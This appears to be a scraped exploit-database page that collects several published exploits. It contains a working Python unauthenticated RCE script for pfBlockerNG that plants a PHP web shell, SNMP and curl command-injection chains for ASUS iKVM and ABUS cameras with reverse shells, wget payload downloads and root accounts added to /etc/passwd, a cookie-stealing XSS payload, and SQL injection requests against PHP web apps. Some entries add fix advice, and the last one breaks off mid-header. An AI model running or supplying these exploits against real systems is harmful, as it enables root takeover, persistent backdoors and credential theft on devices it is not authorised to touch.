Latest exploits :: CodePwn

<pre><code># Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE) # Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22 # Date: 5th of September 2022 # Exploit Author: IHTeam # Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html # Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169 # Version: 2.1.4_26 # Tested on: pfSense 2.6.0 # CVE : CVE-2022-31814 # Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ #!/usr/bin/env python3 import argparse import requests import time import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE") parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/") args = parser.parse_args() url = args.url shell_filename = "system_advanced_control.php" def check_endpoint(url): response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False) if response.status_code == 200: print("[+] pfBlockerNG is installed") else: print("\n[-] pfBlockerNG not installed") sys.exit() def upload_shell(url, shell_filename): payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"} print("[/] Uploading shell...") response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False) time.sleep(2) response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False) if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')): print("[+] Upload succeeded") else: print("\n[-] Error uploading shell. Probably patched ", response.content) sys.exit() def interactive_shell(url, shell_filename, cmd): response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False) print(str(response.text)+"\n") def delete_shell(url, shell_filename): delcmd = "rm /usr/local/www/system_advanced_control.php" response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False) print("\n[+] Shell deleted") check_endpoint(url) upload_shell(url, shell_filename) try: while True: cmd = input("# ") interactive_shell(url, shell_filename, cmd) except: delete_shell(url, shell_filename) </code></pre>

<pre><code>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: ASUS ASMB8 iKVM RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023] # Vendor Homepage: https://servers.asus.com/search?q=ASMB8 # Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) # Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl # CVE: CVE-2023-26602 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a remote server management interface has been discovered. Furthermore, SNMPv2 was found to be enabled, offering write access to the private community, subsequently allowing us to introduce SNMP arbitrary extensions to achieve RCE. We also found a hardcoded account sysadmin:superuser by cracking the shadow file (md5crypt) found on the system and identifed an "anonymous" user w/ the same password, however a lock seems to be in place to prevent using these credentials via SSH (running defshell as default shell). +++++++++++++++ 0x01 IMPACT +++++++++++++++ By exploiting SNMP arbitrary extension, we are able to run any command on the system w/ root privileges, and we are able to introduce our own user circumventing the defshell restriction for SSH. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ At first, we have to create required extensions on the system, e.g. via snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"' and if everything is set, we can just run that command by snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects which will execute our defined command and show us its output. +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ The identified RCE can be used to transfer a reverse tcp shell created by msfvenom for arm little-endian, e.g. msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin We can now transfer the binary, adjust permissions and finally run it: snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' Again, we have to request execution of the lines in the MIB via: snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects We get a reverse connection from the host, and can now act on the local system to easily echo our own line into /etc/passwd: echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd By setting the standard shell to /bin/sh, we are able to get a SSH root shell into the system, effectively circumventing the defshell restriction. $ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # uname -a Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown # uptime 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 # head -n 1 /etc/shadow sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: --- #EOF </code></pre>

<pre><code>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: ABUS Security Camera LFI, RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-001-2023] # Vendor Homepage: https://www.abus.com # Version/Model: TVIP 20000-21150 (probably many others) # Tested on: GM ARM Linux 2.6, Server: Boa/0.94.14rc21 # CVE: CVE-2023-26609 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a network camera was discovered. Web fuzzing revealed a URL of /device containing output about running processes as well as a pretty complete listing of webcontent which inevitably arose our suspicion. More research revealed that files w/ known LFI and RCE issues were present, leading to either arbitrary file reads or remote code execution, both w/ root privileges and using known default credentials (either admin:admin or manufacture:erutcafunam). After closer filesystem inspection, RCE led to a remote root SSH shell. +++++++++++++++ 0x01 IMPACT +++++++++++++++ The LFI vulnerability can be exploited using a URL of: /cgi-bin/admin/fileread?READ.filePath=[filename] and is able to read any file on the system. The RCE vulnerability originates from a command injection and may be exploited by calling a URL of: /cgi-bin/mft/wireless_mft?ap=irrelevant;[command] (as classy as it can get, we can also use the pipe "|" instead, and linefeed a.k.a. "%0a" works as well) effectively giving us remote code (or rather command) execution. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ #!/bin/bash # # ABUS Security Camera LFI # curl -iv "http://admin:admin@a.b.c.d/cgi-bin/admin/fileread?READ.filePath=/$1" The script can be called like: ./LFI.sh /etc/passwd to display the contents of the passwd file. When reading the configuration of the BOA server (/etc/boa.conf), we find hardcoded credentials: # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam These can now be used to execute the RCE (based on command injection): #!/bin/bash # # ABUS Security Camera RCE # curl -iv "http://manufacture:erutcafunam@a.b.c.d/cgi-bin/mft/wireless_mft?ap=testname;$1" and can be called like: ./LFI.sh id to display a user id of uid=0(root) gid=0(root) +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ After having discovered the previously described vulnerabilities, multiple attempts to spawn a nice reverse shell failed as the system was minimal and did neither offer binaries like bash or netcat, nor any compilers or scripting language interpreters to execute our code. Furthermore, binaries that we transferred onto the system (for ARM little-endian architecture) either resulted in "Segmentation fault" (mfsvenom) or as we saw later "Illegal instruction" (netcat for ARM). We had to inspect the local attack surface and use the LOLBIN approach, a.k.a. living off the land binaries available on the system. In this case, the minimal and often busybox-included dropbear SSH daemon became pretty handy. To successfully implement a remote root SSH shell for persistance, several steps had to be undertaken: 1) First, we had to create a valid SSH keyset by reusing our RCE.sh skript: ./RCE.sh "/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear_rsa_host_key" 2) Then, add our user to the password file, e.g.: ./RCE.sh "echo%20d1g:OmE2EUpLJafIk:0:0:root:/:/bin/sh%20>>%20/etc/passwd" 3) Finally, start the server: ./RCE.sh "/etc/dropbear/dropbear%20-E%20-F" We can now SSH (using obsolete and insecure algorithms for both KeyExchange and HostKey) into our rootshell: sshpass -p XXXXXXX ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa d1g@x.x.x.x Welcome to _____ __ ___ __ ___ _ _ _ | ___| / \ / __ \ / \ | _ \ / \ \ \ / / | |___ / /\ \ | /__\ \ / /\ \ | | \ | / /\ \ \ V / | ___|| |__| | | _ / | |__| | | | | | | |__| | \ / | | | __ | | | \ \ | __ | | |_/ / | __ | | | |_| |_| |_| |_| \_\|_| |_| |___ / |_| |_| |_| For further information check: http://www.GM.com/ BusyBox v1.1.3 (2012.07.16-03:58+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. [d1g]# id uid=0(root) gid=0(root) --- #EOF </code></pre>

<pre><code># Simple Food Ordering System - Authenticated Reflected Cross Site Scripting ### Date: > 17 February 2023 ### CVE Assigned: **[CVE-2023-0902](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0902)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0902) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0902) ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Simple Food Ordering System](https://www.sourcecodester.com/php/15418/simple-food-ordering-system-client-side-phpmysqli-free-source-code.html) ### Version: > v 1.0 ### What is Reflected Cross-Site Scripting: > Reflected cross-site scripting (XSS) is a type of web vulnerability that occurs when a web application fails to properly sanitize user input, allowing an attacker to inject malicious code into the application's response to a user's request. When the user's browser receives the response, the malicious code is executed, potentially allowing the attacker to steal sensitive information or take control of the user's account. ### Affected Page: > Vulnerable Page: process_order.php > In this page order parameter is vulnerable to Reflected Cross Site Scripting Attack ### Description: > The Reflected XSS found in order parameter of process_order.php page. Authenticated Reflected Cross-Site Scripting (XSS) is a serious vulnerability that can have a significant impact on the security of a web application and its users. The risk of Authenticated Reflected XSS is similar to that of Reflected XSS, but with the added danger that the attacker must first gain access to a valid user account in order to exploit the vulnerability. The main risk associated with Authenticated Reflected XSS is that it can allow an attacker to steal sensitive information or take control of a user's account on a web application. This can include login credentials, financial information, personal information, and more. Once an attacker gains access to a user's account, they can perform any actions that the user is authorized to do. In addition, Authenticated Reflected XSS can also be used as a stepping stone to launch more advanced attacks, such as phishing attacks, malware distribution, or distributed denial-of-service attacks. By gaining control of a user's account on a web application, an attacker can use that account as a launching point for further attacks against the user or the web application itself. ### Proof of Concept: > Initially, I tried to verify the XSS attack, I used standard XSS payload <script>alert("Verification");</script> and the Below Image confirmed that, the parameter is vulnerable to reflected XSS. > Payload: process_order.php?order=<script>alert(1)<%2fscript>mjii5 > ![image](https://user-images.githubusercontent.com/123810418/219716828-62b529c9-8366-4051-8b2c-f9065b158089.png) > Based on that, I have decided to make it realistic attack and use burp colloborator to hijack user cookie: > Payload: process_order.php?order=<script>fetch(%27http://dummyurl/%27,{method:%27POST%27,mode:%27no-cors%27,body:document.cookie});</script> > ![image](https://user-images.githubusercontent.com/123810418/219717379-d085a7ec-29d4-4d2c-ba19-69e5011891e8.png) ### Recommendation: > Whoever uses this CMS, should update line no 41 of process_order.php with the following code to avoid cross-site scripting attack: ``` Old Code: <?php echo $_GET['order']; ?> New Code: <?php echo htmlspecialchars(strip_tags($_GET['order'])); ?> ``` Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo </code></pre>

<pre><code># Music Gallery Site - SQL Injection on page music_list.php and parameter cid is vulnerable, application url is (?page=music_list&cid=?). >Any remote attacker can access this page to exploit the vulnerbility. ### Date: > 21 February 2023 ### CVE Assigned: **[CVE-2023-0938](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0938)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0938) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0938) ### Author Name: > Muhammad Navaid Zafar Ansari ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html) ### Version: > v 1.0 ### SQL Injection > SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data. ### Affected Page: > music_list.php > On this page cid parameter is vulnerable to SQL Injection Attack > URL of the vulnerable parameter is: /?page=music_list&cid=* ### Description: > The Music Gallery site does have public pages for music library, on music list there is an SQL injection to filter out the music list with category basis. ### Proof of Concept: > Following steps are involved: 1. Go to the category menu and click on view category. 2. In URL, there is a parameter 'cid' which is vulnerable to SQL injection (?page=music_list&cid=4*) ### Request: ``` GET /php-music/?page=music_list&cid=5%27+and+false+union+select+1,version(),database(),4,5,6,7--+- HTTP/1.1 Host: localhost sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ``` ### Response: ![image](https://user-images.githubusercontent.com/123810418/220299762-3a0c02cf-364b-49a0-81e5-e7f3f6ed298b.png) ### Recommendation: > Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack: ``` Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `category_list` where `id` = :id and `delete_flag` = 0 and `status` = 1"); $sql->bindparam(':id', $cid); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC); ``` Thank you for reading --------------------------------------------------------------------------------------------- # Music Gallery Site - SQL Injection on page view_music_details.php and parameter id is vulnerable. >Any remote attacker can access this page to exploit the vulnerbility. ### Date: > 21 February 2023 ### CVE Assigned: **[CVE-2023-0961](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0961)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0961) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0961) ### Author Name: > Muhammad Navaid Zafar Ansari ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html) ### Version: > v 1.0 ### SQL Injection > SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data. # Vulnerable URL: > URL: php-music/view_music_details.php?id=* ### Affected Page: > view_music_details.php > On this page cid parameter is vulnerable to SQL Injection Attack > URL of the vulnerable parameter is: php-music/view_music_details.php?id=* ### Description: > The Music Gallery site does have public pages for music library. Whenever someone click on info button any music the popup will appear on the same page. However, on backend server calls the file view_music_detail.php where Get id parameter is vulnerable to SQL Injection. ### Proof of Concept: > Following steps are involved: 1. Go to the music list and click on view info of any music. 2. intercept the traffic through burp and get the actual URL 3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (view_music_details.php?id=1*) ### Request: ``` GET /php-music/view_music_details.php?id=1%27+and+false+union+select+1,version(),database(),4,@@datadir,6,7,8,9,10,11--+- HTTP/1.1 Host: localhost sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7f Connection: close ``` ### Response: ![image](https://user-images.githubusercontent.com/123810418/220317330-519b0112-85fd-4c6f-bf35-446216d73549.png) ### Recommendation: > Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack: ``` Example Code: $sql = $obj_admin->db->prepare("SELECT * from `music_list` where id = :id and delete_flag = 0"); $sql->bindparam(':id', $id); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC); ``` Thank you for reading --------------------------------------------------------------------------------------------- # Music Gallery Site - SQL Injection on page Master.php and parameter id is vulnerable. > Any remote attacker can access this page to exploit the vulnerbility. ### Date: > 21 February 2023 ### CVE Assigned: **[CVE-2023-0962](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0962)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0962) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0962) ### Author Name: > Muhammad Navaid Zafar Ansari ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html) ### Version: > v 1.0 ### SQL Injection > SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data. # Vulnerable URL: > URL: php-music/classes/Master.php?f=get_music_details&id=* ### Affected Page: > Master.php > On this page, there is "get_music_details" in that id parameter is vulnerable to SQL Injection Attack > URL of the vulnerable parameter is: php-music/classes/Master.php?f=get_music_details&id=* ### Description: > The Music Gallery site does have public pages for music library. Whenever someone click on play button any music the popup will appear on the same page. However, on backend server calls the file Master.php, in that file "get_music_details" is running the music and this function Get id parameter is vulnerable to SQL Injection. ### Proof of Concept: > Following steps are involved: 1. Go to the music list and click on play button of any music. 2. intercept the traffic through burp and get the actual URL 3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (Master.php?f=get_music_details&id=1*) ### Request: ``` GET /php-music/classes/Master.php?f=get_music_details&id=1%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1 Host: localhost Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7f Connection: close ``` ### Response: ![image](https://user-images.githubusercontent.com/123810418/220339548-20e31f82-cab4-4732-8cf7-8a146c2c1d5b.png) ### Recommendation: > Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack: ``` Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `music_list` where `id` = :id"); $sql->bindparam(':id', $id); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC); ``` Thank you for reading </code></pre>

<pre><code># Music Gallery Site - Broken Access Control leads to compromise of complete application by adding admin user without log-in into the application. ### Date: > 21 February 2023 ### CVE Assigned: **[CVE-2023-0963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0963)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0963) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0963) ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html) ### Version: > v 1.0 ### Broken Authentication: > Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review. ### Vulnerable URLs: > /php-music/classes/Users.php >/php-music/classes/Master.php ### Affected Page: > Users.php , Master.php > On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application. ### Description: > Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users ### Proof of Concept: > Following steps are involved: 1. Send a POST request with required parameter to Users.php?f=save (See Below Request) 2. Request: ``` POST /php-music/classes/Users.php?f=save HTTP/1.1 Host: localhost Content-Length: 876 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-music/admin/?page=user/manage_user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundaryjwBNagY7zt6cjYHp Content-Disposition: form-data; name="id" ------WebKitFormBoundaryjwBNagY7zt6cjYHp Content-Disposition: form-data; name="firstname" Test ------WebKitFormBoundaryjwBNagY7zt6cjYHp Content-Disposition: form-data; name="middlename" Admin ------WebKitFormBoundaryjwBNagY7zt6cjYHp Content-Disposition: form-data; name="lastname" Check ------WebKitFormBoundaryjwBNagY7zt6cjYHp Content-Disposition: form-data; name="username" testadmin ------WebKitFormBoundaryjwBNagY7zt6cjYHp Content-Disposition: form-data; name="password" test123 ------WebKitFormBoundaryjwBNagY7zt6cjYHp Content-Disposition: form-data; name="type" 1 ------WebKitFormBoundaryjwBNagY7zt6cjYHp Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryjwBNagY7zt6cjYHp-- ``` 3. It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter) ![image](https://user-images.githubusercontent.com/123810418/220352229-389dfaf8-57e0-470d-b8a5-c873a13b3b51.png) ![image](https://user-images.githubusercontent.com/123810418/220352493-ef35a8ba-c613-4745-9004-0159b3841951.png) 4. Vulnerable Code Snippets: Users.php ![image](https://user-images.githubusercontent.com/123810418/220353008-b1448508-7451-412a-a5eb-049aa20b3d41.png) Master.php ![image](https://user-images.githubusercontent.com/123810418/220353132-1067a86c-282d-4fc5-8733-ceab4b1fef56.png) ### Recommendation: > Whoever uses this CMS, should update the authorization mechanism on top of the Users.php , Master.php pages as per requirement to avoid a Broken Access Control attack: </code></pre>

<pre><code># Employee Task Management System - SQL Injection on (task-details.php?task_id=?) with low privilege authentication ### Date: > 17 February 2023 ### CVE Assigned: **[CVE-2023-0904](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0904)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0904), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0904) ### Author Email: > navaidnasari@hotmail.co.uk ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html) ### Version: > v 1.0 ### SQL Injection > SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data. ### Affected Page: > task-details.php > On this page task_id parameter is vulnerable to SQL Injection Attack ### Description: > The employee task management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below + Admin user has full access to the system + Employee user has only a few menu access i.s. Task Management (view and edit only assigned tasks) and Attendance (clock In and out) > So, if the admin assigns a task to a normal employee, an employee could perform the SQL Injection by viewing that task from his/her profile. Therefore, low-privileged users could able to get the access full system. ### Proof of Concept: > Following steps are involved: + Admin assigned a task to an employee (ABC) + ABC employee view the task and could perform the SQL injection with vulnerable parameter (task-details.php?task_id=765) ### Request: ``` GET /etms/task-details.php?task_id=765%27+and+false+union+select+1,version(),3,database(),user(),6,7,8--+- HTTP/1.1 Host: localhost Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91 Connection: close ``` ### Response: ![image](https://user-images.githubusercontent.com/123810418/219780565-6fb7a74b-ac7f-4ec2-997a-3c69abdf37f7.png) ### Recommendation: > Whoever uses this CMS, should update line no (from 27 to 30) of task-details.php with the following code to avoid SQL Injection attack: ``` Old Code: $sql = "SELECT a.*, b.fullname FROM task_info a LEFT JOIN tbl_admin b ON(a.t_user_id = b.user_id) WHERE task_id='$task_id'"; $info = $obj_admin->manage_all_info($sql); ``` ``` New Code: $sql = $obj_admin->db->prepare("SELECT a.*, b.fullname FROM task_info a LEFT JOIN tbl_admin b ON(a.t_user_id = b.user_id) WHERE task_id=:task_id "); $sql->bindparam(':task_id', $task_id); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC); ``` Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo ------------------------------------------------- # Employee Task Management System - SQL Injection with low privilege authentication ### Date: > 17 February 2023 ### CVE Assigned: **[CVE-2023-0902](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0903)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0903), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0903) ### Author Email: > navaidnasari@hotmail.co.uk 